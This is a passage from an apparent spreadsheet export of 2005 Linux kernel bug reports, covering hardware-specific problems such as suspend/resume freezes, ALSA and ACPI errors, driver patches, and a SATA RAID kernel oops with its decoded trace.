[Ethernet Pro 100] (rev 09) 0000:00:09.1 Serial controller: Agere Systems LT WinModem 0000:00:0a.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 01) 0000:01:00.0 VGA compatible controller: Trident Microsystems CyberBlade i1 (rev 6a) http://zeus.polsl.gliwice.pl/~jfk/kernel/lspci-v http://zeus.polsl.gliwice.pl/~jfk/kernel/lspci-v-v http://zeus.polsl.gliwice.pl/~jfk/kernel/lspci-v-v-v 2. dmesg http://zeus.polsl.gliwice.pl/~jfk/kernel/dmesg Software Environment: 1. config: http://zeus.polsl.gliwice.pl/~jfk/kernel/config-2.6.14-rc4-laptop no changes in config for 2.6.14-rc5, except for some: "+# CONFIG_AIRO is not set" 2. hibernation "script" http://zeus.polsl.gliwice.pl/~jfk/kernel/hib 3. ver-linux (as in 2.6.14-rc4) --------------------------------------------------- Linux miriel 2.6.14-rc4-laptop #5 PREEMPT Fri Nov 11 21:36:41 CET 2005 i686 GNU/Linux Gnu C 4.0.3 Gnu make 3.80 binutils 2.16.91 util-linux 2.12p mount 2.12p module-init-tools 3.2-pre9 e2fsprogs 1.38 reiserfsprogs line reiser4progs line pcmcia-cs 3.2.8 PPP 2.4.3 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Modules Loaded uhci_hcd floppy sd_mod scsi_mod ipx p8022 psnap llc thermal fan button processor ac battery ipt_multiport ipt_state ipt_pkttype ipt_LOG ipt_limit ipt_REJECT iptable_nat ip_nat iptable_filter ip_tables ip_conntrack_ftp ip_conntrack nfnetlink pcmcia firmware_class crc32 8250_pnp yenta_socket rsrc_nonstatic pcmcia_core 8250_pci 8250 serial_core e100 snd_seq_oss snd_seq_midi snd_seq_midi_event snd_seq snd_via82xx gameport snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore via686a i2c_isa i2c_core parport_pc parport nls_iso8859_2 nls_cp852 vfat fat loop rtc psmouse mousedev pegasus mii Problem Description: System freezes while resuming from suspend-to-disk; nothing in logs, nothing on the vga console Steps to reproduce: Start the system, work for a minute or two (what I did was to run X, run browser and exit), suspend (no problem here), resume (freezes after "Stopping tasks: =============..." appears on the screen again). Actually I was able to sucessfully resume with 2.6.14-rc5, but only once (start-&gt;login-&gt;sync, sync-&gt;hibernate) Related: : "Resume from swsusp stopped working with 2.6.14 and 2.6.15-rc1" thread on lkml</t>
  </si>
  <si>
    <t>snd_intel8x0 crash with Java application</t>
  </si>
  <si>
    <t>2005-11-18 14:28 UTC</t>
  </si>
  <si>
    <t>2006-05-12 11:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Slackware 10.1 Hardware Environment: Athlon64/Ali chipset/M5455 audio device/C-Media Electronics Inc CM8738 alternate audio device (lspci appended) Software Environment: ShredderClassic chess program Problem Description: Using a bit the chess program crashes definitely Java VM, with a kernel crash in sound device opening. Dmesg appended. Steps to reproduce: I guess use any Java sound program, I'm using evaluation Shredder chess program, on such hardware.</t>
  </si>
  <si>
    <t>ALSA fails with SB16 value</t>
  </si>
  <si>
    <t>2.6.14-2</t>
  </si>
  <si>
    <t>2005-11-20 23:33 UTC</t>
  </si>
  <si>
    <t>Ralf Neubauer</t>
  </si>
  <si>
    <t>2006-09-07 10:17 UTC</t>
  </si>
  <si>
    <t>Hello, my friendly Debian maintainer told me to put 340108@bugs.debian.org upstream. Most recent kernel where this bug did not occur: -- Distribution: Debian testing Hardware Environment: "SB16 value" card, OSS says (in dmesg) about this card (using the parameters from below): sb: Init: Starting Probe... sb: Probing legacy card with io=220, irq=5, dma=1, dma16=5 SB 4.12 detected OK (220) sb: Turning on MPU sb: Init: Done YM3812 and OPL-3 driver Copyright (C) by Hannu Savolainen, Rob Hooft 1993-1996 The other card I have is detected as SB 4.13 (i think, at least a small difference in the version number) and is jumpered to IRQ7 instead of IRQ5. machine a) K6-III/450 Asus Board, ALi Chipset, e100, GeForce2-MX, Dawicontrol Scsi (AMD chipset) machine b) 5x86/133 VLB/PCI combi board, 3c509, S3 trio sorry I don't know the hardware by heart, but the single constant is the SB16 value, the rest has variations everywhere. of course they are standing at the same global coordinates and the sysop is the same as well (and may be at fault ..). Software Environment: debian kernel linux-image-2.6.14-2-386 or linux-image-2.6.12-1-386 or kernel-image-2.4.27-2-386 with alsa-modules no binary nvidia driver loaded Problem Description: My "SB16 value" cards (ISA, afaik no PNP) don't work with ALSA. The words "SB16 value" are litererally printed on the card. As I found out, these seem to be SB16's without a MIDI interface (but with OPL3). The OSS modules work perfectly with the /etc/modules entries sb irq=5 io=0x220 mpu_io=0x330 dma=1 dma16=5 opl3 io=0x388 The corresponding ALSA line snd-sb16 irq=5 port=0x220 mpu_port=0x330 dma8=1 dma16=5 isapnp=0 simply says FATAL: Error inserting snd_sb16 (/lib/modules/2.6.14-2-386/kernel/sound/isa/sb/snd-sb16.ko): No such device FATAL: Error running install command for snd_sb16 and puts Sound Blaster 16 soundcard not found or device busy In case, if you have AWE card, try snd-sbawe module into dmesg. As there may be no MPU I tried with mpu_port=0 and various other variations (isapnp=1 etc). alsaconf simply tries to use alias snd-card-0 snd-sb16 options snd-sb16 index=0 isapnp=0 which fails as well. Steps to reproduce: reboot, load module with above mentioned parameters.</t>
  </si>
  <si>
    <t>S3 resume: SMP INIT vs _WAK order</t>
  </si>
  <si>
    <t>2005-11-23 12:34 UTC</t>
  </si>
  <si>
    <t>When Linux resumes from S3 on an SMP system, it evaluates _WAK before invoking the INIT to reset and bring the non boot processors on-line. While there appears to be no industry specification that mandates the relative order of INIT and _WAK, it appears to be common industry OS practice for INIT to preceed _WAK, and it appears that some firmware in the future may depend on that sequence for correction operation. In particular, the internal duties that it performs in _WAK must occur after the processors have completed being reset by INIT.</t>
  </si>
  <si>
    <t>Add SMP C-state support for x86_64</t>
  </si>
  <si>
    <t>2005-11-23 18:30 UTC</t>
  </si>
  <si>
    <t>2006-06-25 21:17 UTC</t>
  </si>
  <si>
    <t>x86_64 lacks the _PDC staff, so C2/C3 SMP can't work in x86_64.</t>
  </si>
  <si>
    <t>Francesco</t>
  </si>
  <si>
    <t>Acer TravelMate 3212wxci w/ Kernel 2.6 doesn't recognize USB Pen drives</t>
  </si>
  <si>
    <t>2.6.12-10-686</t>
  </si>
  <si>
    <t>2005-11-25 21:49 UTC</t>
  </si>
  <si>
    <t>Manuel S</t>
  </si>
  <si>
    <t>2005-12-06 14:10 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:Debian Sarge, Etch, Ubuntu 5.10 Hardware Environment:Acer TravelMate 3212wxci Software Environment: Problem Description: The machine get frizzed when a Pen drive is inserted for +/-20 secs and the Pendrive is not recognizes Steps to reproduce: - Insert pen drive (any) - the machine get frizzed ============[ LSPCI ]============================== 0000:00:00.0 Host bridge: Intel Corp. Mobile Memory Controller Hub (rev 04) 0000:00:02.0 VGA compatible controller: Intel Corp. Mobile Graphics Controller (rev 04) 0000:00:02.1 Display controller: Intel Corp. Mobile Graphics Controller (rev 04)0000:00:1c.0 PCI bridge: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 04) 0000:00:1c.1 PCI bridge: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 (rev 04) 0000:00:1d.0 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 04) 0000:00:1d.1 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 04) 0000:00:1d.2 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 04) 0000:00:1d.3 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 04) 0000:00:1d.7 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 04) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev d4) 0000:00:1e.2 Multimedia audio controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 04) 0000:00:1e.3 Modem: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Modem Controller (rev 04) 0000:00:1f.0 ISA bridge: Intel Corp. 82801FBM (ICH6M) LPC Interface Bridge (rev 04) 0000:00:1f.1 IDE interface: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 04) 0000:00:1f.3 SMBus: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 04) 0000:05:00.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) 0000:05:01.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5788 Gigabit Ethernet (rev 03) 0000:05:02.0 Network controller: Intel Corp. PRO/Wireless 2200BG (rev 05) 0000:05:04.0 CardBus bridge: ENE Technology Inc: Unknown device 1412 (rev 10) 0000:05:04.1 FLASH memory: ENE Technology Inc: Unknown device 0530 (rev 01) 0000:05:04.2 0805: ENE Technology Inc: Unknown device 0550 (rev 01) 0000:05:04.3 FLASH memory: ENE Technology Inc: Unknown device 0520 (rev 01) 0000:05:04.4 FLASH memory: ENE Technology Inc: Unknown device 0551 (rev 01) ===============[ lsmod ]===================== Module Size Used by isofs 35960 0 udf 90820 0 ipv6 251232 6 i915 19488 0 drm 64884 1 i915 pcmcia 26568 2 af_packet 21768 2 yenta_socket 25292 1 rsrc_nonstatic 13376 1 yenta_socket pcmcia_core 49348 3 pcmcia,yenta_socket,rsrc_nonstatic ipw2200 103880 0 firmware_class 9952 1 ipw2200 ieee80211 29380 1 ipw2200 ieee80211_crypt 5604 2 ipw2200,ieee80211 ohci1394 34356 0 tpm_nsc 6656 0 tpm 9888 1 tpm_nsc snd_intel8x0 33248 1 snd_ac97_codec 83932 1 snd_intel8x0 snd_pcm_oss 52704 0 snd_mixer_oss 19296 1 snd_pcm_oss snd_pcm 88840 3 snd_intel8x0,snd_ac97_codec,snd_pcm_oss snd_timer 24164 1 snd_pcm snd 54884 8 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer soundcore 9600 1 snd snd_page_alloc 10600 2 snd_intel8x0,snd_pcm hw_random 5172 0 pci_hotplug 27508 0 intel_agp 23164 1 agpgart 34792 3 drm,intel_agp ext2 66824 1 nls_iso8859_1 4000 3 nls_cp437 5664 3 vfat 13440 3 fat 52668 1 vfat evdev 9664 0 tsdev 7776 0 dm_mod 57692 0 sr_mod 17028 0 sbp2 22952 0 scsi_mod 135688 2 sr_mod,sbp2 ieee1394 100792 2 ohci1394,sbp2 psmouse 30116 0 mousedev 11616 1 parport_pc 35236 0 lp 12292 0 parport 35912 2 parport_pc,lp md 45584 0 ext3 136264 4 jbd 54776 1 ext3 mbcache 9252 2 ext2,ext3 processor 22812 0 tg3 96772 0 ehci_hcd 34248 0 uhci_hcd 31184 0 usbcore 118044 3 ehci_hcd,uhci_hcd ide_cd 41572 0 cdrom 39616 2 sr_mod,ide_cd ide_disk 18464 10 ide_generic 1376 0 piix 10372 1 ide_core 138772 4 ide_cd,ide_disk,ide_generic,piix unix 26896 642 vesafb 7992 0 capability 4712 0 commoncap 6816 1 capability vga16fb 12584 1 vgastate 9664 1 vga16fb softcursor 2272 2 vesafb,vga16fb cfbimgblt 2944 2 vesafb,vga16fb cfbfillrect 3872 2 vesafb,vga16fb cfbcopyarea 4608 2 vesafb,vga16fb fbcon 38496 72 tileblit 2368 1 fbcon font 8224 1 fbcon bitblit 5632 1 fbcon</t>
  </si>
  <si>
    <t>blue screen with saa7134 tv/fm tuner after upgrade</t>
  </si>
  <si>
    <t>vanilla-sources-2.6.15_rc*</t>
  </si>
  <si>
    <t>2005-11-27 04:36 UTC</t>
  </si>
  <si>
    <t>gerald fraser</t>
  </si>
  <si>
    <t>2005-11-30 03:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.14.2 Distribution:Gentoo Hardware Environment:P4 Software Environment:Gentoo vanilla-sources-2.6.15_rc2 Problem Description:Both vanilla-sources-2.6.15_rc1 &amp; rc2 show a blue screen (ie no tv) when using tvtime - sound works ok, After re-emerging version 2.6.14 or 2.6.14.2, tv works OK again. tvtime errors seen ad infinitum ... videoinput: Can't read frame. Error was: Invalid argument (0). videoinput: Can't free frame 0: Bad address videoinput: Can't free frame 1: Bad address videoinput: Can't free frame 2: Bad address videoinput: Can't free frame 3: Bad address Steps to reproduce: 1/ upgrade from vanilla-sources.2.6.14 or 2.6.14.2, to 2.6.15_rc1 or rc2 2/ run tvtime with tv input selected logged as Gentoo Bugzilla Bug 113682</t>
  </si>
  <si>
    <t>2.6.14.3</t>
  </si>
  <si>
    <t>ACPI errors for Twinhead F10D (store into alias)</t>
  </si>
  <si>
    <t>2005-11-29 03:04 UTC</t>
  </si>
  <si>
    <t>Felix Braun</t>
  </si>
  <si>
    <t>2006-02-02 15:03 UTC</t>
  </si>
  <si>
    <t>I have bought a new Twinhead F10D laptop (identical to Averatec AV1050). During boot the ACPI subsystem reports these errors for all kernel versions that I have tried (extracted from dmesg): ACPI: Sleep Button (CM) [SLPB] ACPI: Power Button (CM) [PWRB] ACPI-0140: *** Error: Store into Alias - should never happen ACPI-0508: *** Error: Method execution failed [\_SB_.PCI0.IGFX._DOS] (Node c146c360), AE_AML_INTERNAL ACPI: Video Device [IGFX] (multi-head: yes rom: no post: no) ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU1] (supports 8 throttling states) ACPI-0140: *** Error: Store into Alias - should never happen ACPI-0508: *** Error: Method execution failed [\_TZ_.RTMP] (Node c146e400), AE_AML_INTERNAL ACPI-0508: *** Error: Method execution failed [\_TZ_.THRM._TMP] (Node c146e2e0), AE_AML_INTERNAL I guess that as a result, the directory /proc/acpi/thermal_zone is left empty. Apart from these error messages, I have not encoutered any functional problems. Do these errors point to a bug in the ACPI subsystem, or is it rather the BIOS implementation that is buggy? I'll attach additional information. If you need any more information, please let me know.</t>
  </si>
  <si>
    <t>Serial port no longer works</t>
  </si>
  <si>
    <t>2005-11-29 14:39 UTC</t>
  </si>
  <si>
    <t>Ben Gardner</t>
  </si>
  <si>
    <t>2006-04-26 13:10 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13-rc6-mm1 works. 2.6.13.4 works. 2.6.13-rc6-mm2 does not work. 2.6.14 and newer also do not work. Distribution: Custom Hardware Environment: NSC Geode GX2 (i386) with CS5535 companion chip. Serial ports detected as: ttyS0 = 16550A ttyS1 = NS16550A Software Environment: Busybox. Problem Description: A serial port loopback test fails. Steps to reproduce: I attach an RS-232 loopback connector (short pin 2 to 3) and run the following: In terminal 1: $ hd /dev/ttyS1 In terminal 2: $ echo "hi" &gt; /dev/ttyS1 When it works, data is displayed on terminal 1. I have compared 2.6.13-rc6-mm1 against 2.6.13-rc6-mm2 and have not found any obvious problems.</t>
  </si>
  <si>
    <t>8139cp has broken suspend/resume function</t>
  </si>
  <si>
    <t>2.6.? - 2.6.15-rc3</t>
  </si>
  <si>
    <t>2005-11-30 00:53 UTC</t>
  </si>
  <si>
    <t>2010-05-05 03:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Probably never since the code seems to have been added in the current state. Distribution: Fedora Core Rawhide Hardware Environment: HP/Compaq nx7010 Problem Description: The resume function for 8139cp is horribly broken. It has two major problems: * It assumes the interface is up and activates the hardware. If the interface isn't up, then inserting the network cable will cause an interrupt which in turn kills the interrupt. A reboot of the machine is necessary to get things back to normal. * It doesn't properly reset the hardware. At minimum a ifconfig down/up is needed to get things going. Sometimes the module needs to be unloaded and reloaded again. The effect is that nothing can be sent/recieved. No errors occur so it probably thinks everything is peachy. Steps to reproduce: 1. Suspend to disk. 2. Resume. 3. Swear in frustration when you cannot reconnect to the network. I have a patch in -mm that forces the interrupt handler to be loaded at all times (to solve the first problem). It's a dirty solution but was all I could come up with on my own.</t>
  </si>
  <si>
    <t>USB hid simulation descriptor broken</t>
  </si>
  <si>
    <t>2005-11-30 06:44 UTC</t>
  </si>
  <si>
    <t>Rok Markovic</t>
  </si>
  <si>
    <t>2006-01-18 12:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.1 Distribution:Fedora Core 4 Hardware Environment: P4 Software Environment:- Problem Description:After attaching simulation device there is kernel OOPS. After debuging I found a problem in drivers/usb/input/hid-input.c on line 136 where HID_SIMULATION usage is determined. After adding line which is mapping WHEEL uage on absolute axis the problem was eliminated: Sollution: case HID_UP_SIMULATION: switch (usage-&gt;hid &amp; 0xffff) { case 0xba: map_abs(ABS_RUDDER); break; case 0xbb: map_abs(ABS_THROTTLE); break; + case 0xc8: map_abs(ABS_WHEEL); break; } break; Steps to reproduce: Attach a usb car simulation device with steering wheel.</t>
  </si>
  <si>
    <t>Emil Karlson</t>
  </si>
  <si>
    <t>2.6.15-rc5</t>
  </si>
  <si>
    <t>sata_promise: missing pci id for FastTrak S300 TX2plus</t>
  </si>
  <si>
    <t>2005-12-07 13:35 UTC</t>
  </si>
  <si>
    <t>dev</t>
  </si>
  <si>
    <t>2006-10-05 14:43 UTC</t>
  </si>
  <si>
    <t>The FastTrak S300 TX2Plus seems to be just a S150 with higher transfer speed and works fine with the sata_promise driver. Original Promise GPL drivers use same driver for both without modification too. A humble request that the device id will be added to the driver. trivial diff: 211,212d210 &lt; { PCI_VENDOR_ID_PROMISE, 0x3d73, PCI_ANY_ID, PCI_ANY_ID, 0, 0, &lt; board_2037x }, Regards</t>
  </si>
  <si>
    <t>ipw2200: NETDEV_TX_BUSY returned; driver should report queue full via ieee_device-&gt;is_queue_full.</t>
  </si>
  <si>
    <t>2.6.15-rc4-686 (Debians -0experimental.1 build)</t>
  </si>
  <si>
    <t>2005-12-08 01:54 UTC</t>
  </si>
  <si>
    <t>David Schmitt</t>
  </si>
  <si>
    <t>2006-01-29 09:16 UTC</t>
  </si>
  <si>
    <t>Most recent ipw2200 where this bug did not occur: using 2.6.14 and the external ipw2200-source (1.0.8-1) and ieee80211-source (1.1.6-2) from Debian, the card worked without problems. Distribution: Debian Hardware Environment: Samsung M40+ laptop 0000:02:07.0 0280: 8086:4220 (rev 05) 0000:02:07.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Software Environment: from dmesg: ieee80211_crypt: registered algorithm 'NULL' ieee80211: 802.11 data/management/control stack, git-1.1.7 ieee80211: Copyright (C) 2004-2005 Intel Corporation &lt;jketreno@linux.intel.com&gt; ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, git-1.0.8 ipw2200: Copyright(c) 2003-2005 Intel Corporation ACPI: PCI Interrupt Link [LNKE] enabled at IRQ 5 ACPI: PCI Interrupt 0000:02:07.0[A] -&gt; Link [LNKE] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection I have the ipw-2.4 firmware installed in /lib/firmware: $ md5sum ipw-2.4-* bb9b6e2e5522ac13518330d954387f05 ipw-2.4-boot.fw 7ef54b582a45da44cfe8604a5d7a4e6d ipw-2.4-bss.fw 99fdbf6d98a9bc3a2084583fe13f07df ipw-2.4-bss_ucode.fw 907d750e7f277088cb7f6169c1c00813 ipw-2.4-ibss.fw 07a7d1d4c87e04036845ef6f6fb1b193 ipw-2.4-ibss_ucode.fw b62bdbbf640ede966c8d58e6432d196b ipw-2.4-sniffer.fw bd1c3ea4da25b64085fc618c5107ed75 ipw-2.4-sniffer_ucode.fw Problem Description: After displaying the message "eth0: NETDEV_TX_BUSY returned; driver should report queue full via ieee_device-&gt;is_queue_full." in dmesg, the networks stopped working. ifdown/ifup restored the card to a working state. Steps to reproduce: iwconfig eth0: eth0 IEEE 802.11b ESSID:"tunet" Mode:Ad-Hoc Frequency:2.422 GHz Cell: 02:00:EE:5F:23:00 Bit Rate=11 Mb/s Tx-Power=20 dBm Retry limit:7 RTS thr:off Fragment thr:off Encryption key:XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XX Security mode:restricted Power Management:off Link Quality=95/100 Signal level=-31 dBm Noise level=-256 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 After short time (several minutes) and a bit traffic, the interface stopped working. After reconfiguring the interface dmesg said: ipw2200: Firmware error detected. Restarting. ipw2200: Sysfs 'error' log captured. ipw2200: Firmware error detected. Restarting. ipw2200: Sysfs 'error' log already exists. I'll attach the error log to the bug.</t>
  </si>
  <si>
    <t>Eric Moore</t>
  </si>
  <si>
    <t>Non-optimal scheduler with multiple dualcore cpus</t>
  </si>
  <si>
    <t>2005-12-11 04:53 UTC</t>
  </si>
  <si>
    <t>2006-08-05 07:17 UTC</t>
  </si>
  <si>
    <t>Running an eightway dualcore opteron (total 16 cores), the threadscheduler is not doing a very good job. When the system is fully loaded (&gt;16 tasks executing), all cpus are loaded nicely, with the jobs hopping cpus as needed to give them all a fair amount of time. When the system is relatively quiet (like now, only two tasks running), the kernel has the tendency to stick them on CPU #0 and #1. Makes sense on a true SMP-system where the cores are independent, but on a dualcore system it makes the two threads fight over the memorybus on that cpu. Which is sub-optimal, considering there are seven (fourteen) idle CPUs, with seven memory-busses doing nothing. I believe this to be similar to the situation where multiple hyperthreading cpus are used. Although a true dualcore handles multiple tasks much better, and only shares the memorybus, it would still be a good idea to have the scheduler consider physical *cpus* for placement before using physical *cores*.</t>
  </si>
  <si>
    <t>Kernel Panic: IOAPIC[1]: Unable to change apic_id! - TravelMate 2403NWXMi</t>
  </si>
  <si>
    <t>2.6.8, 2.6.14.3</t>
  </si>
  <si>
    <t>2005-12-12 03:47 UTC</t>
  </si>
  <si>
    <t>Jakub Ambro&amp;#380;ewicz</t>
  </si>
  <si>
    <t>2006-08-19 03:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian GNU/Linux Sarge Hardware Environment: Acer TravelMate 2403NWXMi, bios ver.: 2.10 Software Environment: Problem Description: During boot with acpi enabled kernel hangs very early. earlyprintk=vga shows the error Kernel Panic: IOAPIC[1]: Unable to change apic_id! When booting with "acpi=off" everything including touchpad works ok (except acpi of course) When booting with "acpi=noirq pci=noacpi,usepirqmask,routeirq" acpi works but touchpad doesn't Additional info (dmesg, dmidecode, acpidump, kernel config etc) are here http://www.republika.pl/cyryl3/debug/debug_20051210.tar.bz2 Steps to reproduce: Boot kernel without acpi=off</t>
  </si>
  <si>
    <t>Oops writing to SATA RAID disks</t>
  </si>
  <si>
    <t>2,6,15-rc5, 2.6.13.4</t>
  </si>
  <si>
    <t>2005-12-12 06:26 UTC</t>
  </si>
  <si>
    <t>Hans-Joachim Baader</t>
  </si>
  <si>
    <t>2006-02-17 03:16 UTC</t>
  </si>
  <si>
    <t>This bug occurs when writing images with partimage to device /dev/sdp* Hardware is Intel P4 based, two SATA disks in mirroring configuration. System is a minimal system that runs in an initrd environment. After writing exactly 360 MB (+/- 0.25 MB) the partimage process goes in D state and we find an oops in the log. It looks very similar to a problem reported 10 months ago: https://www.redhat.com/archives/dm-devel/2005-February/msg00039.html ksymoops 2.4.9 on i686 2.6.14.2-bapdev. Options used -V (default) -K (specified) -l lsmod (specified) -o /usr/src/lxboot-swfill/lxboot-swfill-V2.0.10-current/root/lib/modules/2.6.15-rc5-swfill (specified) -m /usr/src/linux-2.6.15-rc5-swfill/System.map (specified) No modules in ksyms, skipping objects No ksyms, skipping lsmod Unable to handle kernel paging request at virtual address f88c6000 c01793e5 *pde = 1fc61067 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c01793e5&gt;] Not tainted VLI Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010246 (2.6.15-rc5-swfill) eax: ffffffff ebx: f88c6000 ecx: 07fffdfa edx: 00000000 esi: 00020000 edi: f88c6000 ebp: ffffbf27 esp: f7febec0 ds: 007b es: 007b ss: 0068 Stack: 00000000 00000000 f6d83180 f7febefc f6d4158c f7fcfac0 c01cf8c6 f88c2000 0001bf27 00020000 f6d4158c f6d41580 c01d00ad f687a4e0 f7febefc 0001ffff f6d4158c f6d41580 f687a4e0 c01d0137 f6d4158c f6d41580 c01d0363 f6d4158c Call Trace: [&lt;c01cf8c6&gt;] [&lt;c01d00ad&gt;] [&lt;c01d0137&gt;] [&lt;c01d0363&gt;] [&lt;c01d06ff&gt;] [&lt;c01d0749&gt;] [&lt;c011dd81&gt;] [&lt;c01d071a&gt;] [&lt;c010fce9&gt;] [&lt;c0215d5c&gt;] [&lt;c010fce9&gt;] [&lt;c011dc2b&gt;] [&lt;c0120c5e&gt;] [&lt;c0120be5&gt;] [&lt;c01012b1&gt;] Code: f0 eb 49 89 44 24 04 83 c7 04 c7 04 24 00 00 00 00 89 f8 29 d8 c1 e0 03 29 c5 74 26 8d 4d 1f 89 fb c1 e9 05 b8 ff ff ff ff 31 d2 &lt;f3&gt; af 74 09 33 47 fc 83 ef 04 0f bc d0 29 df c1 e7 03 01 fa 89 &gt;&gt;EIP; c01793e5 &lt;find_next_zero_bit+76/a1&gt; &lt;===== &gt;&gt;eax; ffffffff &lt;__kernel_rt_sigreturn+1bbf/????&gt; &gt;&gt;ebx; f88c6000 &lt;pg0+38611000/3fd49400&gt; &gt;&gt;ecx; 07fffdfa &lt;phys_startup_32+7effdfa/c0000000&gt; &gt;&gt;edi; f88c6000 &lt;pg0+38611000/3fd49400&gt; &gt;&gt;ebp; ffffbf27 &lt;pg0+3fd46f27/3fd49400&gt; &gt;&gt;esp; f7febec0 &lt;pg0+37d36ec0/3fd49400&gt; Trace; c01cf8c6 &lt;core_get_resync_work+27/55&gt; Trace; c01d00ad &lt;__rh_recovery_prepare+14/84&gt; Trace; c01d0137 &lt;rh_recovery_prepare+1a/3b&gt; Trace; c01d0363 &lt;do_recovery+13/64&gt; Trace; c01d06ff &lt;do_mirror+4e/69&gt; Trace; c01d0749 &lt;do_work+2f/58&gt; Trace; c011dd81 &lt;worker_thread+156/1ba&gt; Trace; c01d071a &lt;do_work+0/58&gt; Trace; c010fce9 &lt;default_wake_function+0/12&gt; Trace; c0215d5c &lt;schedule+456/4bb&gt; Trace; c010fce9 &lt;default_wake_function+0/12&gt; Trace; c011dc2b &lt;worker_thread+0/1ba&gt; Trace; c0120c5e &lt;kthread+79/a3&gt; Trace; c0120be5 &lt;kthread+0/a3&gt; Trace; c01012b1 &lt;kernel_thread_helper+5/b&gt; This architecture has variable length instructions, decoding before eip is unreliable, take these instructions with a pinch of salt. Code; c01793ba &lt;find_next_zero_bit+4b/a1&gt; 00000000 &lt;_EIP&gt;: Code; c01793ba &lt;find_next_zero_bit+4b/a1&gt; 0: f0 eb 49 lock jmp 4c &lt;_EIP+0x4c&gt; Code; c01793bd &lt;find_next_zero_bit+4e/a1&gt; 3: 89 44 24 04 mov %eax,0x4(%esp) Code; c01793c1 &lt;find_next_zero_bit+52/a1&gt; 7: 83 c7 04 add $0x4,%edi Code; c01793c4 &lt;find_next_zero_bit+55/a1&gt; a: c7 04 24 00 00 00 00 movl $0x0,(%esp) Code; c01793cb &lt;find_next_zero_bit+5c/a1&gt; 11: 89 f8 mov %edi,%eax Code; c01793cd &lt;find_next_zero_bit+5e/a1&gt; 13: 29 d8 sub %ebx,%eax Code; c01793cf &lt;find_next_zero_bit+60/a1&gt; 15: c1 e0 03 shl $0x3,%eax Code; c01793d2 &lt;find_next_zero_bit+63/a1&gt; 18: 29 c5 sub %eax,%ebp Code; c01793d4 &lt;find_next_zero_bit+65/a1&gt; 1a: 74 26 je 42 &lt;_EIP+0x42&gt; Code; c01793d6 &lt;find_next_zero_bit+67/a1&gt; 1c: 8d 4d 1f lea 0x1f(%ebp),%ecx Code; c01793d9 &lt;find_next_zero_bit+6a/a1&gt; 1f: 89 fb mov %edi,%ebx Code; c01793db &lt;find_next_zero_bit+6c/a1&gt; 21: c1 e9 05 shr $0x5,%ecx Code; c01793de &lt;find_next_zero_bit+6f/a1&gt; 24: b8 ff ff ff ff mov $0xffffffff,%eax Code; c01793e3 &lt;find_next_zero_bit+74/a1&gt; 29: 31 d2 xor %edx,%edx This decode from eip onwards should be reliable Code; c01793e5 &lt;find_next_zero_bit+76/a1&gt; 00000000 &lt;_EIP&gt;: Code; c01793e5 &lt;find_next_zero_bit+76/a1&gt; &lt;===== 0: f3 af repz scas %es:(%edi),%eax &lt;===== Code; c01793e7 &lt;find_next_zero_bit+78/a1&gt; 2: 74 09 je d &lt;_EIP+0xd&gt; Code; c01793e9 &lt;find_next_zero_bit+7a/a1&gt; 4: 33 47 fc xor 0xfffffffc(%edi),%eax Code; c01793ec &lt;find_next_zero_bit+7d/a1&gt; 7: 83 ef 04 sub $0x4,%edi Code; c01793ef &lt;find_next_zero_bit+80/a1&gt; a: 0f bc d0 bsf %eax,%edx Code; c01793f2 &lt;find_next_zero_bit+83/a1&gt; d: 29 df sub %ebx,%edi Code; c01793f4 &lt;find_next_zero_bit+85/a1&gt; f: c1 e7 03 shl $0x3,%edi Code; c01793f7 &lt;find_next_zero_bit+88/a1&gt; 12: 01 fa add %edi,%edx Code; c01793f9 &lt;find_next_zero_bit+8a/a1&gt; 14: 89 .byte 0x89 Interrupts: CPU0 0: 78885 IO-APIC-edge timer 1: 554 IO-APIC-edge i8042 